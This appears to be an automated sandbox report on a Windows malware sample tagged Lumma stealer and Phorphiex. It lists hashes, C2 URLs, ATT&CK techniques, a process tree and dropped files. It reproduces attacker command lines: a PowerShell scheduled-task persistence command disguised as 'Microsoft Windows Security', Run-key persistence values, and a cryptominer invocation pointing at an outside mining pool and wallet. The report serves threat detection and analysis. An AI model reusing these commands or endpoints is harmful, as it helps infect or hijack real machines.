lumma | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Analysis

max time kernel
300s
max time network
299s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
27-11-2024 01:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

lumma phorphiex discovery execution loader persistence stealer trojan worm

Malware Config

Extracted

Family

lumma

https://servicedny.site

https://authorisev.site

https://faulteyotk.site

https://dilemmadu.site

https://contemteny.site

https://goalyfeastz.site

https://opposezmny.site

https://seallysl.site

https://ponintnykqwm.shop/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral3/files/0x001900000002aaf8-4320.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 3648 created 3336	3648	Winsvc.exe	52
PID 2580 created 3336	2580	nxmr.exe	52
PID 2580 created 3336	2580	nxmr.exe	52

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs	Winsvc.exe

Executes dropped EXE 12 IoCs

pid	Process
3648	Winsvc.exe
1420	LummaC222222.exe
2580	nxmr.exe
1896	meta.exe
3104	khtoawdltrha.exe
3000	pei.exe
4472	r.exe
2284	157725929.exe
3012	winupsecvmgr.exe
3748	sysnldcvmr.exe
752	Lumm.exe
4736	sysnldcvmr.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	r.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe"	157725929.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3612	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
12	raw.githubusercontent.com

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3104	khtoawdltrha.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3648 set thread context of 2960	3648	Winsvc.exe	81
PID 1896 set thread context of 3724	1896	meta.exe	92
PID 2960 set thread context of 4692	2960	InstallUtil.exe	104

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\sysnldcvmr.exe	r.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	r.exe
File created	C:\Windows\sysnldcvmr.exe	157725929.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LummaC222222.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pei.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	157725929.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lumm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	khtoawdltrha.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3648	Winsvc.exe
2580	nxmr.exe
2580	nxmr.exe
3612	powershell.exe
3612	powershell.exe
2580	nxmr.exe
2580	nxmr.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe
2960	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4476	4363463463464363463463463.exe
Token: SeDebugPrivilege	3648	Winsvc.exe
Token: SeDebugPrivilege	3648	Winsvc.exe
Token: SeDebugPrivilege	1896	meta.exe
Token: SeDebugPrivilege	3612	powershell.exe
Token: SeDebugPrivilege	3724	regsvcs.exe
Token: SeBackupPrivilege	3724	regsvcs.exe
Token: SeSecurityPrivilege	3724	regsvcs.exe
Token: SeSecurityPrivilege	3724	regsvcs.exe
Token: SeSecurityPrivilege	3724	regsvcs.exe
Token: SeSecurityPrivilege	3724	regsvcs.exe
Token: SeIncreaseQuotaPrivilege	3612	powershell.exe
Token: SeSecurityPrivilege	3612	powershell.exe
Token: SeTakeOwnershipPrivilege	3612	powershell.exe
Token: SeLoadDriverPrivilege	3612	powershell.exe
Token: SeSystemProfilePrivilege	3612	powershell.exe
Token: SeSystemtimePrivilege	3612	powershell.exe
Token: SeProfSingleProcessPrivilege	3612	powershell.exe
Token: SeIncBasePriorityPrivilege	3612	powershell.exe
Token: SeCreatePagefilePrivilege	3612	powershell.exe
Token: SeBackupPrivilege	3612	powershell.exe
Token: SeRestorePrivilege	3612	powershell.exe
Token: SeShutdownPrivilege	3612	powershell.exe
Token: SeDebugPrivilege	3612	powershell.exe
Token: SeSystemEnvironmentPrivilege	3612	powershell.exe
Token: SeRemoteShutdownPrivilege	3612	powershell.exe
Token: SeUndockPrivilege	3612	powershell.exe
Token: SeManageVolumePrivilege	3612	powershell.exe
Token: 33	3612	powershell.exe
Token: 34	3612	powershell.exe
Token: 35	3612	powershell.exe
Token: 36	3612	powershell.exe
Token: SeIncreaseQuotaPrivilege	3612	powershell.exe
Token: SeSecurityPrivilege	3612	powershell.exe
Token: SeTakeOwnershipPrivilege	3612	powershell.exe
Token: SeLoadDriverPrivilege	3612	powershell.exe
Token: SeSystemProfilePrivilege	3612	powershell.exe
Token: SeSystemtimePrivilege	3612	powershell.exe
Token: SeProfSingleProcessPrivilege	3612	powershell.exe
Token: SeIncBasePriorityPrivilege	3612	powershell.exe
Token: SeCreatePagefilePrivilege	3612	powershell.exe
Token: SeBackupPrivilege	3612	powershell.exe
Token: SeRestorePrivilege	3612	powershell.exe
Token: SeShutdownPrivilege	3612	powershell.exe
Token: SeDebugPrivilege	3612	powershell.exe
Token: SeSystemEnvironmentPrivilege	3612	powershell.exe
Token: SeRemoteShutdownPrivilege	3612	powershell.exe
Token: SeUndockPrivilege	3612	powershell.exe
Token: SeManageVolumePrivilege	3612	powershell.exe
Token: 33	3612	powershell.exe
Token: 34	3612	powershell.exe
Token: 35	3612	powershell.exe
Token: 36	3612	powershell.exe
Token: SeIncreaseQuotaPrivilege	3612	powershell.exe
Token: SeSecurityPrivilege	3612	powershell.exe
Token: SeTakeOwnershipPrivilege	3612	powershell.exe
Token: SeLoadDriverPrivilege	3612	powershell.exe
Token: SeSystemProfilePrivilege	3612	powershell.exe
Token: SeSystemtimePrivilege	3612	powershell.exe
Token: SeProfSingleProcessPrivilege	3612	powershell.exe
Token: SeIncBasePriorityPrivilege	3612	powershell.exe
Token: SeCreatePagefilePrivilege	3612	powershell.exe
Token: SeBackupPrivilege	3612	powershell.exe
Token: SeRestorePrivilege	3612	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4692	AddInProcess.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3104	khtoawdltrha.exe

Suspicious use of WriteProcessMemory 61 IoCs

description	pid	Process	procid_target
PID 4476 wrote to memory of 3648	4476	4363463463464363463463463.exe	78
PID 4476 wrote to memory of 3648	4476	4363463463464363463463463.exe	78
PID 4476 wrote to memory of 1420	4476	4363463463464363463463463.exe	79
PID 4476 wrote to memory of 1420	4476	4363463463464363463463463.exe	79
PID 4476 wrote to memory of 1420	4476	4363463463464363463463463.exe	79
PID 4476 wrote to memory of 2580	4476	4363463463464363463463463.exe	80
PID 4476 wrote to memory of 2580	4476	4363463463464363463463463.exe	80
PID 3648 wrote to memory of 2960	3648	Winsvc.exe	81
PID 3648 wrote to memory of 2960	3648	Winsvc.exe	81
PID 3648 wrote to memory of 2960	3648	Winsvc.exe	81
PID 3648 wrote to memory of 2960	3648	Winsvc.exe	81
PID 3648 wrote to memory of 2960	3648	Winsvc.exe	81
PID 3648 wrote to memory of 2960	3648	Winsvc.exe	81
PID 3648 wrote to memory of 2020	3648	Winsvc.exe	82
PID 3648 wrote to memory of 2020	3648	Winsvc.exe	82
PID 3648 wrote to memory of 2020	3648	Winsvc.exe	82
PID 4476 wrote to memory of 1896	4476	4363463463464363463463463.exe	86
PID 4476 wrote to memory of 1896	4476	4363463463464363463463463.exe	86
PID 4476 wrote to memory of 3104	4476	4363463463464363463463463.exe	91
PID 4476 wrote to memory of 3104	4476	4363463463464363463463463.exe	91
PID 4476 wrote to memory of 3104	4476	4363463463464363463463463.exe	91
PID 1896 wrote to memory of 3724	1896	meta.exe	92
PID 1896 wrote to memory of 3724	1896	meta.exe	92
PID 1896 wrote to memory of 3724	1896	meta.exe	92
PID 1896 wrote to memory of 3724	1896	meta.exe	92
PID 1896 wrote to memory of 3724	1896	meta.exe	92
PID 1896 wrote to memory of 3724	1896	meta.exe	92
PID 1896 wrote to memory of 3724	1896	meta.exe	92
PID 1896 wrote to memory of 3724	1896	meta.exe	92
PID 4476 wrote to memory of 3000	4476	4363463463464363463463463.exe	94
PID 4476 wrote to memory of 3000	4476	4363463463464363463463463.exe	94
PID 4476 wrote to memory of 3000	4476	4363463463464363463463463.exe	94
PID 4476 wrote to memory of 4472	4476	4363463463464363463463463.exe	95
PID 4476 wrote to memory of 4472	4476	4363463463464363463463463.exe	95
PID 4476 wrote to memory of 4472	4476	4363463463464363463463463.exe	95
PID 3000 wrote to memory of 2284	3000	pei.exe	99
PID 3000 wrote to memory of 2284	3000	pei.exe	99
PID 3000 wrote to memory of 2284	3000	pei.exe	99
PID 4472 wrote to memory of 3748	4472	r.exe	101
PID 4472 wrote to memory of 3748	4472	r.exe	101
PID 4472 wrote to memory of 3748	4472	r.exe	101
PID 4476 wrote to memory of 752	4476	4363463463464363463463463.exe	102
PID 4476 wrote to memory of 752	4476	4363463463464363463463463.exe	102
PID 4476 wrote to memory of 752	4476	4363463463464363463463463.exe	102
PID 2284 wrote to memory of 4736	2284	157725929.exe	103
PID 2284 wrote to memory of 4736	2284	157725929.exe	103
PID 2284 wrote to memory of 4736	2284	157725929.exe	103
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104
PID 2960 wrote to memory of 4692	2960	InstallUtil.exe	104

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3336
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4476
- - C:\Users\Admin\AppData\Local\Temp\Files\Winsvc.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Winsvc.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3648
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:2020
- - C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1420
- - C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2580
- - C:\Users\Admin\AppData\Local\Temp\Files\meta.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\meta.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1896
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3724
- - C:\Users\Admin\AppData\Local\Temp\Files\khtoawdltrha.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\khtoawdltrha.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3104
- - C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3000
  - - C:\Users\Admin\AppData\Local\Temp\157725929.exe
      C:\Users\Admin\AppData\Local\Temp\157725929.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2284
    - - C:\Users\Admin\sysnldcvmr.exe
        
        C:\Users\Admin\sysnldcvmr.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4736
- - C:\Users\Admin\AppData\Local\Temp\Files\r.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4472
  - - C:\Windows\sysnldcvmr.exe
      C:\Windows\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3748
- - C:\Users\Admin\AppData\Local\Temp\Files\Lumm.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Lumm.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:752
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2960
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50
    3⤵
    - Suspicious use of FindShellTrayWindow
    PID:4692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3612
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:5052

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Executes dropped EXE
PID:3012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Files\02.08.2022.exe

Filesize
64B

MD5
912210ddf33a31568cdc373941bfb289

SHA1
d76d94240b094fbb96173775e32edc90277dcc0c

SHA256
a508b93169184210d27c770133e8fbff56a04b5345f2c483e3f3c8ef91c4b34e

SHA512
79b4372b734cfc5c0358d4e516cf16096738e4309e39a517b2beb9abb601e08160804fae499fe0e7fd05f7ac34b8b32bc15e55cc4260fff3b031379b3fb0e573

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Lumm.exe

Filesize
6.2MB

MD5
11c8962675b6d535c018a63be0821e4c

SHA1
a150fa871e10919a1d626ffe37b1a400142f452b

SHA256
421e36788bfcb4433178c657d49aa711446b3a783f7697a4d7d402a503c1f273

SHA512
3973c23fc652e82f2415ff81f2756b55e46c6807cc4a8c37e5e31009cec45ab47c5d4228c03b5e3a972cacd6547cf0d3273965f263b1b2d608af89f5be6e459a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe

Filesize
352KB

MD5
2f1d09f64218fffe7243a8b44345b27e

SHA1
72553e1b3a759c17f54e7b568f39b3f8f1b1cdbe

SHA256
4a553c39728410eb0ebd5e530fc47ef1bdf4b11848a69889e8301974fc26cde2

SHA512
5871e2925ca8375f3c3ce368c05eb67796e1fbec80649d3cc9c39b57ee33f46476d38d3ea8335e2f5518c79f27411a568209f9f6ef38a56650c7436bbaa3f909

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Winsvc.exe

Filesize
2.1MB

MD5
169a647d79cf1b25db151feb8d470fc7

SHA1
86ee9ba772982c039b070862d6583bcfed764b2c

SHA256
e61431610df015f48ebc4f4bc0492c4012b34d63b2f474badf6085c9dbc7f708

SHA512
efb5fd3e37da05611be570fb87929af73e7f16639b5eb23140381434dc974afc6a69f338c75ede069b387015e302c5106bf3a8f2727bb0406e7ca1de3d48a925

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\khtoawdltrha.exe

Filesize
1.2MB

MD5
21eb0b29554b832d677cea9e8a59b999

SHA1
e6775ef09acc67f90e07205788a4165cbf8496ca

SHA256
9aaa862061c903f3f5a1d509f0016a599b9152d02ea0365dfd3bbd9c5c147656

SHA512
e7434e0d46e37e4a76bd8e394063a3ac531892b972347b3de8aa71689ded1ce4968b1a1defda720af4cfa66037390cbe771105e7bf892ef640cbee12e862e742

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\meta.exe

Filesize
2.7MB

MD5
3aace51d76b16a60e94636150bd1137e

SHA1
f6f1e069df72735cb940058ddfb7144166f8489b

SHA256
b51004463e8cdfe74c593f1d3e883ff20d53ad6081de7bf46bb3837b86975955

SHA512
95fb1f22ed9454911bfca8ada4c8d0a6cf402de3324b133e1c70afaa272a5b5a54302a0d1eb221999da9343ba90b3cac0b2daecf1879d0b9b40857330a0d0f4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe

Filesize
5.6MB

MD5
13b26b2c7048a92d6a843c1302618fad

SHA1
89c2dfc01ac12ef2704c7669844ec69f1700c1ca

SHA256
1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256

SHA512
d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\pei.exe

Filesize
10KB

MD5
08dafe3bb2654c06ead4bb33fb793df8

SHA1
d1d93023f1085eed136c6d225d998abf2d5a5bf0

SHA256
fc16c0bf09002c93723b8ab13595db5845a50a1b6a133237ac2d148b0bb41700

SHA512
9cf2bd749a9ee6e093979bc0d3aacfba03ad6469c98ff3ef35ce5d1635a052e4068ac50431626f6ba8649361802f7fb2ffffb2b325e2795c54b7014180559c99

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\r.exe

Filesize
79KB

MD5
0c883b1d66afce606d9830f48d69d74b

SHA1
fe431fe73a4749722496f19b3b3ca0b629b50131

SHA256
d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

SHA512
c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1n5dvxer.oqy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2960-1233-0x000001B462610000-0x000001B46271A000-memory.dmp

Filesize
1.0MB

Download
memory/2960-5269-0x000001B4483D0000-0x000001B448426000-memory.dmp

Filesize
344KB

Download
memory/2960-1231-0x000001B448310000-0x000001B448318000-memory.dmp

Filesize
32KB

Download
memory/2960-1229-0x0000000000400000-0x00000000004CE000-memory.dmp

Filesize
824KB

Download
memory/3104-5287-0x0000000000250000-0x0000000000613000-memory.dmp

Filesize
3.8MB

Download
memory/3104-3747-0x0000000000250000-0x0000000000613000-memory.dmp

Filesize
3.8MB

Download
memory/3612-5264-0x000001FFF3030000-0x000001FFF3052000-memory.dmp

Filesize
136KB

Download
memory/3648-66-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-1209-0x00007FFCFBEF3000-0x00007FFCFBEF5000-memory.dmp

Filesize
8KB

Download
memory/3648-70-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-16-0x000002AF3A150000-0x000002AF3A36C000-memory.dmp

Filesize
2.1MB

Download
memory/3648-64-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-58-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-56-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-54-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-52-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-50-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-48-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-46-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-42-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-40-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-76-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-38-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-37-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-34-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-62-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-60-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-28-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-26-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-24-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-20-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-19-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

Download
memory/3648-17-0x00007FFCFBEF0000-0x00007FFCFC9B2000-memory.dmp

Filesize
10.8MB

Download
memory/3648-1203-0x00007FFCFBEF0000-0x00007FFCFC9B2000-memory.dmp

Filesize
10.8MB

Download
memory/3648-1205-0x000002AF3C070000-0x000002AF3C0BC000-memory.dmp

Filesize
304KB

Download
memory/3648-1204-0x000002AF54EB0000-0x000002AF54FBE000-memory.dmp

Filesize
1.1MB

Download
memory/3648-15-0x00007FFCFBEF3000-0x00007FFCFBEF5000-memory.dmp

Filesize
8KB

Download
memory/3648-1207-0x00007FFCFBEF0000-0x00007FFCFC9B2000-memory.dmp

Filesize
10.8MB

Download
memory/3648-18-0x000002AF54C10000-0x000002AF54DAE000-memory.dmp

Filesize
1.6MB

Download
memory/3648-72-0x000002AF54C10000-0x000002AF54DA8000-memory.dmp

Filesize
1.6MB

